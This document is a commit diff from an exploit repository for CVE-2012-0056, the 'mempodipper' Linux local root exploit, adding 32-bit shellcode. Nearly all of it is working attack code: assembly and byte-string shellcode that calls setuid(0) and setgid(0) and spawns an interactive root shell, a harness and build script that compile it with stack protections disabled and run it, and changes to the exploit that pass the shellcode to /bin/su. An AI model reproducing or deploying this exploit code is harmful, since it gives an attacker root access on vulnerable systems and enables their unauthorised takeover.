diff options
| author |   Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-22 06:16:39 +0100 |
|---|---|---|
| committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-22 06:16:39 +0100 |
| commit | 14b33f1b7c5c761cc089dede4fa6aeb187ff66ac (patch) | |
| tree | df5f2aed70c872d7bc3059e2dc6de6c78fb17f90 | |
| parent | Add custom 64bit shellcode and preserve stderr. (diff) | |
| download | CVE-2012-0056-14b33f1b7c5c761cc089dede4fa6aeb187ff66ac.tar.xz CVE-2012-0056-14b33f1b7c5c761cc089dede4fa6aeb187ff66ac.zip | |
Add 32bit shellcode.
| -rwxr-xr-x | build-and-run-shellcode.sh | 6 | ||||
| -rw-r--r-- | harness.c | 7 | ||||
| -rw-r--r-- | mempodipper.c | 12 | ||||
| -rwxr-xr-x | run-shellcode.sh | 2 | ||||
| -rw-r--r-- | shellcode-32.s | 53 | ||||
| -rw-r--r-- | shellcode-64.s | 4 |
6 files changed, 76 insertions, 8 deletions
diff --git a/build-and-run-shellcode.sh b/build-and-run-shellcode.sh new file mode 100755 index 0000000..0a8a34b --- /dev/null +++ b/build-and-run-shellcode.sh @@ -0,0 +1,6 @@ +#!/bin/sh +if [ "$1" == "32" ]; then + nasm -o /dev/stdout shellcode-32.s | msfencode4.0 -t c -e generic/none -b '\x00' > harness.c && echo "void main() { (*(void(*)())buf)(); }" >> harness.c && gcc -m32 -fno-stack-protector -z execstack -o harness harness.c && ./harness +else + nasm -o /dev/stdout shellcode-64.s | msfencode4.0 -t c -e generic/none -b '\x00' > harness.c && echo "void main() { (*(void(*)())buf)(); }" >> harness.c && gcc -fno-stack-protector -z execstack -o harness harness.c && ./harness +fi diff --git a/harness.c b/harness.c new file mode 100644 index 0000000..10bf6ce --- /dev/null +++ b/harness.c @@ -0,0 +1,7 @@ +unsigned char buf[] = +"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40" +"\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69" +"\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb" +"\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48" +"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05"; +void main() { (*(void(*)())buf)(); } diff --git a/mempodipper.c b/mempodipper.c index 1fb8cc2..fb20c26 100644 --- a/mempodipper.c +++ b/mempodipper.c @@ -203,24 +203,28 @@ int main(int argc, char **argv) lseek64(fd, offset, SEEK_SET); #if defined(__i386__) - // Shellcode from: http://www.shell-storm.org/shellcode/files/shellcode-599.php + // See shellcode-32.s in this package for the source. char shellcode[] = - "\x6a\x17\x58\x31\xdb\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f" - "\x62\x69\x6e\x89\xe3\x99\x31\xc9\xb0\x0b\xcd\x80"; + "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\xb3\x06\xb1" + "\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f" + "\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89\xe0\x31" + "\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80"; + #elif defined(__x86_64__) + // See shellcode-64.s in this package for the source. char shellcode[] = "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40" "\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69" "\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb" "\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48" "\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05"; + #else #error "That platform is not supported." #endif printf("[+] Executing su with shellcode.\n"); execl("/bin/su", "su", shellcode, NULL); } else { - sleep(0.01); char pid[32]; sprintf(pid, "%d", parent_pid); printf("[+] Executing child from child fork.\n"); diff --git a/run-shellcode.sh b/run-shellcode.sh deleted file mode 100755 index 5ffcf39..0000000 --- a/run-shellcode.sh +++ /dev/null @@ -1,2 +0,0 @@ -#!/bin/sh -nasm -o /dev/stdout shellcode-64.s | msfencode4.0 -t c -e generic/none -b '\x00' > harness.c && echo "void main() { (*(void(*)())buf)(); }" >> harness.c && gcc -fno-stack-protector -z execstack -o harness harness.c && ./harness diff --git a/shellcode-32.s b/shellcode-32.s new file mode 100644 index 0000000..d08b93f --- /dev/null +++ b/shellcode-32.s @@ -0,0 +1,53 @@ +BITS 32 +; This shell code sets uid and gid to 0 and execs a shell in interactive mode. +; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper. +; +; by zx2c4 + + +;setuid(0) +xor ebx,ebx +mov al,0x17 +int 0x80 +;setgid(0) +xor ebx,ebx +mov al,0x2e +int 0x80 +;dup2(6, 2) +mov bl,0x6 +mov cl,0x2 +mov al,0x3f +int 0x80 + + + +; execve("//bin/sh", ["//bin/sh", "-i", 0], 0) +xor eax,eax ; eax = 0 +push eax ; push eax +push 0x68732f6e ; push //bin/sh +push 0x69622f2f +mov ebx,esp ; set ebx (arg 1) to top of stack + +xor edx,edx ; edx = 0 +mov dx,'-i' ; edx = '-i' +push edx ; push edx to stack +mov eax,esp ; set eax to top of stack + +xor edx,edx ; edx = 0 + +; so at this point: +; ebx is a pointer to '//bin/sh' +; eax is a pointer to '-i' +; edx is null +; since they are all the same size, we'll push them on the stack +; and then it will be an array: +push edx ; push edx to stack +push eax ; push eax to stack +push ebx ; push ebx to stack +mov ecx,esp ; set ecx (arg 2) to top of stack + +xor edx,edx ; rdx (arg 3) = 0 + +xor eax,eax +mov al,0xb ; al = 0x3b, which is the exec call +int 0x80 diff --git a/shellcode-64.s b/shellcode-64.s index 2514ed2..f465c5d 100644 --- a/shellcode-64.s +++ b/shellcode-64.s @@ -19,13 +19,13 @@ mov sil,0x2 mov al,0x21 syscall -; execve("//bin/sh", ["//bin/sh", "-i", 0], 0) +; execve("/bin/sh", ["/bin/sh", "-i", 0], 0) mov qword rbx,'//bin/sh' ; rbx = //bin/sh shr rbx,0x8 ; remove leading / from rbx push rbx ; push rbx to stack mov rdi,rsp ; set rdi (arg 1) to top of stack -xor rbx,rbx +xor rbx,rbx ; rbx = 0 mov bx,'-i' ; rbx = '-i' push rbx ; push rbx to stack mov rcx,rsp ; set rcx to top of stack |